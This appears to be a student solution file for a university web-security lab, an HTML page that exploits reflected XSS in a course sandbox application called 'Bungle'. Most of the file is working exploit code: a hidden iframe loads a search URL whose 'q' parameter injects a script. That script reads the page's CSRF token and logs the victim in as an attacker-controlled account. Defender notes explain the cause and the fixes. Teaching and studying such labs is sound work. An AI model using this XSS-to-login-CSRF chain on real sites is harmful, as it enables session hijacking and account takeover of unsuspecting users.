- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- // Once the DOM is ready, build the crafted search URL with makeLink() and set it
- // as the src of the #frame iframe. The iframe is declared with the `hidden`
- // attribute, so the framed request produces no visible change on this page.
- // Defender note: this step depends on the target page allowing itself to be
- // framed cross-origin; a frame-ancestors / X-Frame-Options policy on the target
- // would refuse the framed load.
- $(document).ready(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("#frame").attr("src", url);
- });
- // payload() is never called on this page. makeLink() serializes it with
- // payload.toString() and embeds the source text in the `q` parameter of the
- // search URL, so it is meant to execute inside whatever page reflects `q`
- // without HTML-encoding it.
- // NOTE(review): because the function's source text is what gets serialized,
- // any edit inside the body (comments included) changes the generated URL;
- // documentation is therefore kept above the function, not inside it.
- //
- // What the body does, in order:
- //   1. hides the <html> element;
- //   2. proxy('./') loads './' into the <html> element with jQuery .load();
- //   3. in the load callback it shows the element again, logs the value of
- //      input[name=csrf_token], and POSTs to the /login endpoint with a fixed
- //      username/password and the csrf_token value read from the loaded page.
- //
- // Defender note: this appears to be a login-CSRF demonstration. The anti-CSRF
- // token gives no protection here because the script runs same-origin and can
- // read the token from the DOM; the root cause to fix is the unescaped
- // reflection of `q` (contextual output encoding, plus a Content-Security-Policy
- // that disallows inline script as defense in depth).
- // Extend this function:
- function payload() {
- function proxy(href) {
- $('html').load(href, function(){
- console.log('loaded nex page');
- $('html').show();
- console.log($('input[name=csrf_token]').val());
- $.post('http://bungle-cs461.cs.illinois.edu/login?csrfdefense=1&xssdefense=0', {username: 'attacker', password: 'l33th4x', csrf_token: $('input[name=csrf_token]').val() });
- });
- }
- $('html').hide();
- proxy('./');
- }
- // Builds the search URL that carries the serialized payload.
- //
- // Parameters:
- //   xssdefense - accepted but not used; the query string hard-codes xssdefense=0.
- //   target     - base URL the "./search?..." path and query are appended to.
- //   attacker   - accepted but not used in this function.
- // Returns: target + "./search?csrfdefense=1&xssdefense=0&q=" followed by the
- //   URL-encoded text of a script element containing payload's source and a
- //   call to payload().
- //
- // Defender note: the link only has an effect if the search endpoint echoes `q`
- // into its HTML response without encoding it.
- function makeLink(xssdefense, target, attacker) {
- return target + "./search?csrfdefense=1&xssdefense=0" + "&q=" +
- // NOTE(review): the tag strings are split as "<script" + ">" presumably so the
- // literal closing tag never appears inside this page's own inline script block,
- // where the HTML parser would end the block early; confirm before merging them.
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload();</script" + ">");
- }
- // Page-level configuration read by the document-ready handler. These are
- // assigned after the handler is registered, but the handler only runs once
- // the DOM is ready, after this script block has finished executing.
- // xssdefense: passed to makeLink(), which ignores it and hard-codes xssdefense=0.
- var xssdefense = 0;
- // target: base URL of the application the crafted search link points at.
- var target = "http://bungle-cs461.cs.illinois.edu/";
- // attacker: loopback URL passed to makeLink(); nothing in this listing sends data to it.
- var attacker = "http://127.0.0.1:31337/stolen";
- </script>
- <iframe hidden id = "frame" src = "" width = "100%" height = "300"> </iframe>